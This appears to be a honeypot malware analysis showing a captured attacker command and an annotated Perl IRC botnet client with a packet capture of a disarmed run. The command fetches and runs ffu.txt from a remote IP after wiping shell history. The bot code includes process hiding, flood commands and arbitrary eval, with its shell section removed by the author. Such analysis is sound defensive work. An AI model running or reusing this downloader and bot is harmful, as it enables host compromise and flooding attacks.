IRC

20160920-125012-5970.log

Downloading a text file...

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Running exec command "unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; wget uggc://212.154.211.81/ffu.txt ; curl -O uggc://212.154.211.81/ffu.txt ; perl ffu.txt 185.14.57.44 ; rm -rf ffu.txt* "
						

ffu.txt is a Perl IRC bot:

#!/usr/bin/perl
# Analyst note: start-up section of the bot. It sets configuration, hides the
# process name, ignores termination signals and forks into the background.

# A parenthesised list assigned to a scalar yields its last element, so
# $processo ends up as "[sync_supers]". It is written to $0 further down.
my $processo =("[cpuset]","","[sync_supers]");

# URL path fragments; one is picked at random. Neither @titi nor $goni is used
# by the visible code -- possibly leftovers or used by the removed section.
my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];

# $linas_max and $sleep are not referenced anywhere in the visible listing.
my $linas_max='3';
my $sleep='7';
# Nicks (@adms) and host part (@hostauth) that parse() accepts commands from.
# NOTE(review): the single-letter values look like placeholders put in by
# whoever published the sample -- confirm against the original file.
my @adms=("x", "y", "z", "w" );
my @hostauth=("local");
# Channels ("canais") joined after registration; see the 001 branch in parse().
my @canais=("#xx");
# Nick is the output of `uname` minus its trailing newline ("Linux" in the
# capture further down this page).
chop (my $nick = `uname`);
# Default server ("servidor"); overridden by the first command-line argument.
my $servidor="3.4.5.6";
my $ircname =("g");
my $realname = ("g");
# The IRC connection goes to port 21 or 23, chosen at random, so the traffic
# shows up on the FTP/telnet ports while carrying IRC protocol lines.
my @ircport = ("21","23");
my $porta = $ircport[rand scalar @ircport];
my $VERSAO = '0.5';
# INT, HUP, TERM and CHLD are ignored, so closing the terminal or a plain
# `kill` does not stop the process; SIGKILL cannot be ignored.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
# NOTE(review): 'PS' is not a standard signal name; this line presumably has
# no effect.
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
# Working directory becomes /tmp.
chdir("/tmp");
$servidor="$ARGV[0]" if $ARGV[0];
# Overwrites the process title with the bracketed name above, padded with NUL
# bytes. A bracketed, kernel-thread-like name on a process that has a perl
# executable and open sockets is a useful host-side indicator.
$0="$processo"."\0"x16;;
# Fork and let the parent exit: the child keeps running after the launching
# command returns.
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

# Per-connection state, keyed by the socket handle.
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

# Select set holding the connected IRC sockets; polled by the main loop.
$sel_cliente = IO::Select->new();
# Writes one raw IRC protocol line, terminated with "\n".
# With two arguments the first is the socket and the second the line;
# otherwise the single argument is written to the global $IRC_cur_socket.
sub sendraw {
  # $#_ is the last index of @_, so 1 means exactly two arguments.
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

# Opens a TCP connection to an IRC server and registers on it.
# Arguments: nick, server host, server port.
# Returns 1 when the socket cannot be created.
sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     # This socket becomes the default target of sendraw().
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     # Record host, port, nick and the local address for this connection.
     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     # Registration: NICK, then USER carrying the local IP and the server name.
     # This is the "USER g <local ip> <server> :g" line visible in the capture.
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
# Main loop: keeps a connection open, reads from the ready sockets and hands
# complete lines to parse().
# $line_temp carries an incomplete trailing line over to the next read.
my $line_temp;
while( 1 ) {
   # Reconnect for as long as no server is registered. There is no delay
   # between attempts other than the sleep inside conectar() on success.
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   # Zero timeout: can_read() returns immediately, so this loop polls
   # continuously rather than blocking.
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     # A read of zero bytes means the peer closed: drop the socket and its state.
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       # Prepend whatever was left over from the previous read.
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           # Last fragment of the buffer: parse it when it is the only line,
           # ended in "\r", or is a NOTICE AUTH line; otherwise keep it as a
           # partial line for the next read.
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

# Handles one line received from the server: PING keep-alive, PRIVMSG commands
# from authorised senders, nick tracking, nick collision (433) and welcome (001).
sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       # $pn = sender nick, $hostmask = sender host, $onde = target
       # (channel or nick), $args = message text.
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       # CTCP VERSION is answered for any sender, before the authorisation
       # check, with a fixed mIRC version string. The static reply can serve
       # as a network indicator.
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       # Authorisation is only a case-insensitive exact match of the sender's
       # host against @hostauth and of the nick against @adms; no secret is
       # exchanged.
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         # A private message addressed to the bot's nick goes to shell().
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         # Messages prefixed with the bot's nick or "!say":
         #   "!..."  -> ircase()  (IRC control commands)
         #   "@..."  -> bfunc()   (not defined in the visible listing)
         #   other   -> shell()
         if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                # Reply target: the channel, or the sender when messaged privately.
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
        }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       # Track the bot's own nick when it changes.
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       # 433 = nickname in use: retry as "<nick>|<random number>", which is the
       # "Linux|57428" form seen in the capture.
       nick("$meunick|".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       # 001 = welcome: store the assigned nick and the server name, then join
       # every configured channel with the key "ddosit".
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}



# Dispatches the "!" commands of an authorised sender.
# Arguments: $kem = sender nick, $printl = where the command was seen,
# $case = command text without the leading "!".
# Each command is tested with its own `if`, so the tests are independent.
sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }

# "refresh" declares a new lexical $goni that goes out of scope at the closing
# brace, so it has no visible effect.
if ($case =~ /^refresh (.*)/) {
my $goni = $titi[rand scalar @titi];
 }

   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   # "rejoin [count] <channel>": part and join again, optionally repeated.
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   # "op" / "deop": bare form acts on the sender in the current target; the
   # two-word form names channel and nick explicitly.
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   # "flood" / "ctcpflood": send the same PRIVMSG or CTCP <count> times.
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   # "connect <server> <nick>": opens an additional connection on port 6667.
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   # "raw": forwards the text to the server unmodified.
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   # "eval": string eval of the operator's text, i.e. arbitrary Perl runs
   # inside the bot process with its privileges.
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

# Command handler reached from parse(). Arguments: reply target and command text.
# Only the "cd" special case is visible here; the rest of the body was removed
# by the page author, so its behaviour cannot be documented from this listing.
sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  # "cd <dir>" changes the bot's own working directory and reports failure
  # back over IRC.
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  }
----8<--------8<--------8<--------8<--------8<--------8<----
                    REMOVED SHELL CODE
----8<--------8<--------8<--------8<--------8<--------8<----
}

# Sends a CTCP request: a PRIVMSG whose text is wrapped in \001 bytes.
# Arguments: target, CTCP text. Does nothing unless exactly two are given.
sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
# Sends a PRIVMSG. Arguments: target, text.
# Does nothing unless exactly two arguments are given.
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}
# Sends a NOTICE. Arguments: target, text.
# Does nothing unless exactly two arguments are given.
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
# Sends "MODE <channel> +o <nick>". Arguments: channel, nick.
# Does nothing unless exactly two arguments are given.
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
# Sends "MODE <channel> -o <nick>". Arguments: channel, nick.
# Does nothing unless exactly two arguments are given.
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
# Short alias for the join sub below. The & call form selects the user-defined
# sub rather than Perl's built-in join.
sub j { &join(@_); }
# Sends "JOIN <channel>". Does nothing unless exactly one argument is given.
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
# Short alias for part().
sub p { part(@_); }
# Sends "PART <channel>". Unlike the other helpers, the argument count is not
# checked.
sub part {
  sendraw("PART $_[0]");
}
# Sends "NICK <nick>". Does nothing unless exactly one argument is given.
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
# Sends "QUIT :<message>". Not called anywhere in the visible listing.
sub quit {
  sendraw("QUIT :$_[0]");
}
						

Connecting to the IRC server on the specified ports didn't work: it only answered with a "Login:" prompt, so I tried running a disarmed version of ffu.txt in case I had missed something.

Same result:

20:37:23.570507 IP CLIENT.57529 > SERVER.ftp: Flags [S], seq 1770788891, win 29200, options [mss 1460,sackOK,TS val 893558695 ecr 0,nop,wscale 8], length 0
E..<..@.@..K......9,....i.........r............
5B..........
20:37:23.619689 IP SERVER.ftp > CLIENT.57529: Flags [S.], seq 672731776, ack 1770788892, win 5792, options [mss 1460,sackOK,TS val 723604774 ecr 893558695,nop,wscale 7], length 0
E..<..@.9.$...9,........(...i.......!Z.........
+!U&5B......
20:37:23.619861 IP CLIENT.57529 > SERVER.ftp: Flags [.], ack 1, win 115, options [nop,nop,TS val 893558707 ecr 723604774], length 0
E..4..@.@..R......9,....i...(......s.......
5B..+!U&
20:37:23.620757 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 1:12, ack 1, win 115, options [nop,nop,TS val 893558708 ecr 723604774], length 11
E..?..@.@..F......9,....i...(......s.......
5B..+!U&NICK Linux

20:37:23.669759 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 12, win 46, options [nop,nop,TS val 723604824 ecr 893558708], length 0
E..4G.@.9..9..9,........(...i..'....fN.....
+!UX5B..
20:37:23.669940 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 12:51, ack 1, win 115, options [nop,nop,TS val 893558720 ecr 723604824], length 39
E..[..@.@..)......9,....i..'(......s.......
5B..+!UXUSER g 146.185.152.192 185.14.57.44 :g

20:37:23.718935 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 51, win 46, options [nop,nop,TS val 723604873 ecr 893558720], length 0
E..4G.@.9..8..9,........(...i..N....e......
+!U.5B..
20:37:29.847008 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 1:58, ack 51, win 46, options [nop,nop,TS val 723611001 ecr 893558720], length 57
E..mG.@.9.....9,........(...i..N...........
+!my5B..:hub.63066.net 433 * Linux :Nickname is already in use.

20:37:29.847053 IP CLIENT.57529 > SERVER.ftp: Flags [.], ack 58, win 115, options [nop,nop,TS val 893560264 ecr 723611001], length 0
E..4..@.@..O......9,....i..N(......s.......
5B..+!my
20:37:29.848171 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 51:68, ack 58, win 115, options [nop,nop,TS val 893560265 ecr 723611001], length 17
E..E..@.@..=......9,....i..N(......s.......
5B..+!myNICK Linux|57428

20:37:29.897222 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 68, win 46, options [nop,nop,TS val 723611051 ecr 893560265], length 0
E..4G.@.9..6..9,........(...i.._....Gu.....
+!m.5B..
20:37:29.898030 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 58:196, ack 68, win 46, options [nop,nop,TS val 723611052 ecr 893560265], length 138
E...G.@.9.....9,........(...i.._.....#.....
+!m.5B..:hub.63066.net 001 Linux|57428 :Linux|57428!g@srv02.pwnd.land
:hub.63066.net 001 Linux|57428 :Login:
:hub.63066.net 376 Linux|57428 :

20:37:29.898232 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 68:84, ack 196, win 119, options [nop,nop,TS val 893560277 ecr 723611052], length 16
E..D..@.@..=......9,....i.._(..D...w.......
5B..+!m.JOIN #xx ddosit

20:37:29.986660 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 84, win 46, options [nop,nop,TS val 723611141 ecr 893560277], length 0
E..4G.@.9..4..9,........(..Di..o....Fu.....
+!n.5B..
20:37:29.986778 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 84:100, ack 196, win 119, options [nop,nop,TS val 893560299 ecr 723611141], length 16
E..D..@.@..<......9,....i..o(..D...w.......
5B..+!n.JOIN #xx ddosit

20:37:30.035732 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 100, win 46, options [nop,nop,TS val 723611190 ecr 893560299], length 0
E..4G.@.9..3..9,........(..Di.......F......
+!n65B..
20:39:30.023369 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 196:217, ack 100, win 46, options [nop,nop,TS val 723731178 ecr 893560299], length 21
E..IG.@.9.....9,........(..Di.......^......
+#B.5B..PING :hub.63066.net

20:39:30.023911 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 100:120, ack 217, win 119, options [nop,nop,TS val 893590308 ecr 723731178], length 20
E..H..@.@..7......9,....i...(..Y...w.......
5C.$+#B.PONG :hub.63066.net

20:39:30.073194 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 120, win 46, options [nop,nop,TS val 723731228 ecr 893590308], length 0
E..4G.@.9..1..9,........(..Yi..............
+#C.5C.$
20:41:30.025773 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 217:238, ack 120, win 46, options [nop,nop,TS val 723851181 ecr 893590308], length 21
E..IG.@.9.....9,........(..Yi..............
+%..5C.$PING :hub.63066.net

20:41:30.026639 IP CLIENT.57529 > SERVER.ftp: Flags [P.], seq 120:140, ack 238, win 119, options [nop,nop,TS val 893620309 ecr 723851181], length 20
E..H..@.@..6......9,....i...(..n...w.......
5C.U+%..PONG :hub.63066.net

20:41:30.075899 IP SERVER.ftp > CLIENT.57529: Flags [.], ack 140, win 46, options [nop,nop,TS val 723851231 ecr 893620309], length 0
E..4G.@.9../..9,........(..ni..............
+%..5C.U

20:43:18.837162 IP CLIENT.57529 > SERVER.ftp: Flags [F.], seq 140, ack 238, win 119, options [nop,nop,TS val 893647512 ecr 723851231], length 0
E..4..@.@..I......9,....i...(..n...w.......
5C..+%..
20:43:18.887514 IP SERVER.ftp > CLIENT.57529: Flags [P.], seq 238:252, ack 141, win 46, options [nop,nop,TS val 723960043 ecr 893647512], length 14
E..BG.@.9.. ..9,........(..ni.......2......
+&..5C..Disconnected					
